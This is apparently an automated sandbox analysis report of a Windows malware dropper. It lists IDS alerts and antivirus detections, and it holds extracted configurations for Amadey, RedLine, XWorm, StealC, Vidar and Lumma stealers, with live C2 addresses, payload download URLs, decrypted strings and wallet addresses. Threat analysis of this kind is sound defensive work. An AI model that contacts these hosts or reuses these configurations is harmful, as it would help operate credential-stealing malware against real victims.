2024-09-27T04:21:50.680334+0200	2044696	1	A Network Trojan was detected	192.168.2.5	49785	185.215.113.16	80	TCP
2024-09-27T04:21:53.973182+0200	2044696	1	A Network Trojan was detected	192.168.2.5	49782	185.215.113.43	80	TCP
2024-09-27T04:21:56.466873+0200	2044696	1	A Network Trojan was detected	192.168.2.5	49782	185.215.113.43	80	TCP
2024-09-27T04:22:01.219170+0200	2044696	1	A Network Trojan was detected	192.168.2.5	49782	185.215.113.43	80	TCP
2024-09-27T04:22:07.424305+0200	2044696	1	A Network Trojan was detected	192.168.2.5	49782	185.215.113.43	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:39.568380+0200	2056156	1	Domain Observed Used for C2 Detected	192.168.2.5	60924	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:46.017818+0200	2056154	1	Domain Observed Used for C2 Detected	192.168.2.5	55665	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:41.811165+0200	2056162	1	Domain Observed Used for C2 Detected	192.168.2.5	63062	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:40.882674+0200	2056164	1	Domain Observed Used for C2 Detected	192.168.2.5	54804	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:42.843407+0200	2056160	1	Domain Observed Used for C2 Detected	192.168.2.5	52855	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:48.022682+0200	2056150	1	Domain Observed Used for C2 Detected	192.168.2.5	55686	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:47.003766+0200	2056152	1	Domain Observed Used for C2 Detected	192.168.2.5	60964	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:43.849666+0200	2056158	1	Domain Observed Used for C2 Detected	192.168.2.5	56006	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:15.518160+0200	2044245	1	Malware Command and Control Activity Detected	185.215.113.17	80	192.168.2.5	49722	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:15.512109+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.5	49722	185.215.113.17	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:15.743022+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.5	49722	185.215.113.17	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:16.427085+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.5	49722	185.215.113.17	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:15.836522+0200	2044247	1	Malware Command and Control Activity Detected	185.215.113.17	80	192.168.2.5	49722	TCP

ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:08.140028+0200	2046045	1	A Network Trojan was detected	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:12.148645+0200	2046045	1	A Network Trojan was detected	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:29.352246+0200	2046045	1	A Network Trojan was detected	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:32.851910+0200	2046045	1	A Network Trojan was detected	192.168.2.5	49750	185.215.113.67	15206	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:15.281835+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	49722	185.215.113.17	80	TCP
2024-09-27T04:21:35.722605+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	49755	91.202.233.158	80	TCP
2024-09-27T04:21:42.610943+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	49767	185.215.113.37	80	TCP
2024-09-27T04:21:53.975115+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	49791	185.215.113.37	80	TCP
2024-09-27T04:21:56.463262+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	49796	185.215.113.37	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:03.109743+0200	2856147	1	A Network Trojan was detected	192.168.2.5	49710	185.215.113.16	80	TCP
2024-09-27T04:21:13.800459+0200	2856147	1	A Network Trojan was detected	192.168.2.5	49721	185.215.113.26	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:05.370019+0200	2856122	1	A Network Trojan was detected	185.215.113.16	80	192.168.2.5	49710	TCP
2024-09-27T04:21:18.379078+0200	2856122	1	A Network Trojan was detected	185.215.113.26	80	192.168.2.5	49721	TCP
2024-09-27T04:21:53.673028+0200	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.5	49782	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:04.166961+0200	2803305	3	Unknown Traffic	192.168.2.5	49711	185.215.113.117	80	TCP
2024-09-27T04:21:06.704853+0200	2803305	3	Unknown Traffic	192.168.2.5	49713	194.116.215.195	80	TCP
2024-09-27T04:21:09.984061+0200	2803305	3	Unknown Traffic	192.168.2.5	49716	185.215.113.26	80	TCP
2024-09-27T04:21:12.657577+0200	2803305	3	Unknown Traffic	192.168.2.5	49720	185.215.113.16	80	TCP
2024-09-27T04:21:14.987691+0200	2803305	3	Unknown Traffic	192.168.2.5	49724	176.113.115.95	80	TCP
2024-09-27T04:21:15.269386+0200	2803305	3	Unknown Traffic	192.168.2.5	49725	185.215.113.117	80	TCP
2024-09-27T04:21:21.116616+0200	2803305	3	Unknown Traffic	192.168.2.5	49728	185.215.113.16	80	TCP
2024-09-27T04:21:24.234487+0200	2803305	3	Unknown Traffic	192.168.2.5	49733	185.215.113.117	80	TCP
2024-09-27T04:21:27.329679+0200	2803305	3	Unknown Traffic	192.168.2.5	49740	185.215.113.117	80	TCP
2024-09-27T04:21:29.688021+0200	2803305	3	Unknown Traffic	192.168.2.5	49744	185.215.113.16	80	TCP
2024-09-27T04:21:32.247108+0200	2803305	3	Unknown Traffic	192.168.2.5	49749	185.215.113.16	80	TCP
2024-09-27T04:21:34.905386+0200	2803305	3	Unknown Traffic	192.168.2.5	49753	185.215.113.16	80	TCP
2024-09-27T04:21:37.791130+0200	2803305	3	Unknown Traffic	192.168.2.5	49759	185.215.113.103	80	TCP
2024-09-27T04:21:42.150872+0200	2803305	3	Unknown Traffic	192.168.2.5	49766	185.215.113.103	80	TCP
2024-09-27T04:21:46.036192+0200	2803305	3	Unknown Traffic	192.168.2.5	49774	185.215.113.16	80	TCP
2024-09-27T04:21:57.192672+0200	2803305	3	Unknown Traffic	192.168.2.5	49799	185.215.113.103	80	TCP
2024-09-27T04:22:02.175425+0200	2803305	3	Unknown Traffic	192.168.2.5	49812	185.215.113.16	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:16.988562+0200	2803304	3	Unknown Traffic	192.168.2.5	49722	185.215.113.17	80	TCP
2024-09-27T04:21:24.196540+0200	2803304	3	Unknown Traffic	192.168.2.5	49722	185.215.113.17	80	TCP
2024-09-27T04:21:25.629497+0200	2803304	3	Unknown Traffic	192.168.2.5	49722	185.215.113.17	80	TCP
2024-09-27T04:21:26.443025+0200	2803304	3	Unknown Traffic	192.168.2.5	49722	185.215.113.17	80	TCP
2024-09-27T04:21:27.063921+0200	2803304	3	Unknown Traffic	192.168.2.5	49722	185.215.113.17	80	TCP
2024-09-27T04:21:28.866765+0200	2803304	3	Unknown Traffic	192.168.2.5	49722	185.215.113.17	80	TCP
2024-09-27T04:21:29.597316+0200	2803304	3	Unknown Traffic	192.168.2.5	49722	185.215.113.17	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: lootebarrkeyn.shop	Avira URL Cloud: Label: malware
Source: stogeneratmns.shop	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/	Avira URL Cloud: Label: malware
Source: https://reinforcenh.shop/api	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/e96ea2db21fa9a1b.php	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/inc/rstxdhuj.exez&	Avira URL Cloud: Label: phishing
Source: http://185.215.113.17/f1ddeb6592c03206/msvcp140.dllfaHD	Avira URL Cloud: Label: malware
Source: fragnantbui.shop	Avira URL Cloud: Label: malware
Source: http://185.215.113.17/2fb6c2cc8dce150a.php3	Avira URL Cloud: Label: malware
Source: http://185.215.113.17/2fb6c2cc8dce150a.php4	Avira URL Cloud: Label: malware
Source: http://185.215.113.17/f1ddeb6592c03206/softokn3.dllJa	Avira URL Cloud: Label: malware
Source: offensivedzvju.shop	Avira URL Cloud: Label: malware
Source: http://185.215.113.103/mine/random.exe	Avira URL Cloud: Label: malware
Source: http://194.116.215.195/12dsvc.exe	Avira URL Cloud: Label: malware
Source: http://176.113.115.95/thebig/stories.exe	Avira URL Cloud: Label: malware
Source: http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.17/2fb6c2cc8dce150a.phpf	Avira URL Cloud: Label: malware
Source: http://185.215.113.17/2fb6c2cc8dce150a.phpp	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000003.00000002.2137528658.00000000006D1000.00000040.00000001.01000000.00000007.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Source: 00000007.00000002.2695505270.00000000037A5000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": "95.179.250.45:26212", "Bot Id": "LiveTraffic", "Message": "Error! Disable antivirus and try again!", "Authorization Header": "143feb5082f9936e624c1e27545e7d19"}
Source: 00000024.00000002.3118723302.0000000004141000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["188.190.10.161"], "Port": "4444", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: 00000016.00000002.2971489446.0000000003710000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php", "Botnet": "default"}
Source: 00000016.00000002.2971489446.0000000003710000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php", "Botnet": "default"}
Source: 13.2.RegAsm.exe.400000.1.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["lootebarrkeyn.shop", "ghostreedmnu.shop", "fragnantbui.shop", "vozmeatillu.shop", "stogeneratmns.shop", "reinforcenh.shop", "offensivedzvju.shop", "gutterydhowi.shop", "drawzhotdog.shop"], "Build id": "FATE99--Mix"}

Multi AV Scanner detection for domain / URL

Source: ballotnwu.site	Virustotal: Detection: 8%	Perma Link
Source: lootebarrkeyn.shop	Virustotal: Detection: 15%	Perma Link
Source: http://91.202.233.158/	Virustotal: Detection: 19%	Perma Link
Source: https://reinforcenh.shop/api	Virustotal: Detection: 15%	Perma Link
Source: http://91.202.233.158/e96ea2db21fa9a1b.php	Virustotal: Detection: 21%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Nework[1].exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\newbundle2[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exe	ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\12dsvc[1].exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\LummaC222222[1].exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\crypted[1].exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\neon[1].exe	ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\rstxdhuj[1].exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\stealc_default2[1].exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cccc2[1].exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\gold[1].exe	ReversingLabs: Detection: 100%

Multi AV Scanner detection for submitted file

Source: file.exe

Virustotal: Detection: 56%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\EBook JS Plugin 9.26.47\EBook JS Plugin 9.26.47.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: reinforcenh.shop
Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: stogeneratmns.shop
Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: fragnantbui.shop
Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: drawzhotdog.shop
Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: vozmeatillu.shop
Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: offensivedzvju.shop
Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: ghostreedmnu.shop
Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: gutterydhowi.shop
Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: drawzhotdog.shop
Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 0000002B.00000002.3158798841.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TBnDlH--
Source: 37.2.InstallUtil.exe.800000.0.unpack	String decryptor: 188.190.10.161
Source: 37.2.InstallUtil.exe.800000.0.unpack	String decryptor: 4444
Source: 37.2.InstallUtil.exe.800000.0.unpack	String decryptor: <IlwAYl63V65*l#>
Source: 37.2.InstallUtil.exe.800000.0.unpack	String decryptor: <Xwormmm>
Source: 37.2.InstallUtil.exe.800000.0.unpack	String decryptor: XWorm V5.6
Source: 37.2.InstallUtil.exe.800000.0.unpack	String decryptor: USB.exe
Source: 37.2.InstallUtil.exe.800000.0.unpack	String decryptor: bc1qyrkl2d6y5szrmqdhc4tv5jjavgyrtlcu072d73
Source: 37.2.InstallUtil.exe.800000.0.unpack	String decryptor: 0xCF1f6F491C7C6345B2139C0bB9204e64f37BD4e9
Source: 37.2.InstallUtil.exe.800000.0.unpack	String decryptor: TVc65vYbkKfbEAqihVbyZuSVVagPux7c7h

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe

Unpacked PE file: 23.2.fidovideorecorder32_64.exe.400000.0.unpack

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fido Video Recorder_is1

Source: unknown	HTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.5:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.5:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.5:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.208.139:443 -> 192.168.2.5:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.13:443 -> 192.168.2.5:49786 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: stealc_default2.exe, 00000013.00000002.3061112605.0000000068E3D000.00000002.00000001.01000000.00000021.sdmp
Source:	Binary string: .pdb8 source: axplong.exe, 00000006.00000003.3054813558.0000000001620000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.0000000001620000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: stealc_default2.exe, 00000013.00000002.3061741872.0000000068FFF000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: nss3.pdb source: stealc_default2.exe, 00000013.00000002.3061741872.0000000068FFF000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: mozglue.pdb source: stealc_default2.exe, 00000013.00000002.3061112605.0000000068E3D000.00000002.00000001.01000000.00000021.sdmp
Source:	Binary string: c:\rje\tg\7v\obj\Release\Qrr.pdb source: axplong.exe, 00000006.00000003.3054996905.0000000005F26000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.2999307768.0000000005F2B000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138409494.0000000005F2C000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.2998919451.0000000005F23000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0041B6EA FindFirstFileExW,	13_2_0041B6EA
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 16_2_001CD9FD FindFirstFileExW,	16_2_001CD9FD
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 17_2_0024D9FD FindFirstFileExW,	17_2_0024D9FD

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\Desktop\desktop.ini

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 06E4E122h	9_2_06E4DE60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_06E4E7B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 06E4F70Ah	9_2_06E4F2D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 06E4FB8Ah	9_2_06E4F2D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then inc dword ptr [ebp-20h]	9_2_06E42E88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 06E4ACCBh	9_2_06E4ACB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 06E4CD8Dh	9_2_06E4CD6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then inc dword ptr [ebp-20h]	9_2_06E43158
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov eax, dword ptr [esp]	14_2_00EBD2C0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then jmp eax	14_2_00EF7600
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov word ptr [eax], cx	14_2_00EFA7E0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	14_2_00EFAC00
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	14_2_00EF50E0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov byte ptr [ebx], al	14_2_00EE40F5
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov byte ptr [ebx], al	14_2_00EE40F5
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then push ebx	14_2_00EC5078
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then movzx edi, byte ptr [eax+esi]	14_2_00EB7120
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov word ptr [eax], cx	14_2_00EDA2F9
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov word ptr [edx], ax	14_2_00EDA2F9
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	14_2_00EF2280
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov word ptr [eax], cx	14_2_00EDA274
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov word ptr [edx], ax	14_2_00EDA274
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov ebx, eax	14_2_00EBA3C0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov ebp, eax	14_2_00EBA3C0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	14_2_00EDC390
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	14_2_00EDC390
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh	14_2_00EF9390
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov eax, dword ptr [esp]	14_2_00EF9390
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	14_2_00EE1370
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov word ptr [eax], cx	14_2_00EDA345
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov word ptr [edx], ax	14_2_00EDA345
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov eax, dword ptr [esp]	14_2_00EDA345
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	14_2_00ED04A0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov word ptr [eax], dx	14_2_00ED04A0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov eax, dword ptr [esp]	14_2_00ED4490
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov eax, dword ptr [esp]	14_2_00EDF5B7
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov ecx, esi	14_2_00EDD58E
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov ecx, esi	14_2_00EDD56C
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov eax, dword ptr [esi+000006A8h]	14_2_00ECE52C
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	14_2_00EEB510
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov eax, dword ptr [esi]	14_2_00EC46B5
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	14_2_00EBF7E0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov byte ptr [ebx], al	14_2_00EE27B0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	14_2_00EE27B0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov byte ptr [ebx], al	14_2_00EE27B0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov byte ptr [ebx], al	14_2_00EE27B0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov byte ptr [ebx], al	14_2_00EE27B0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov byte ptr [ebx], al	14_2_00EE27B0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov byte ptr [edi], al	14_2_00EE27B0
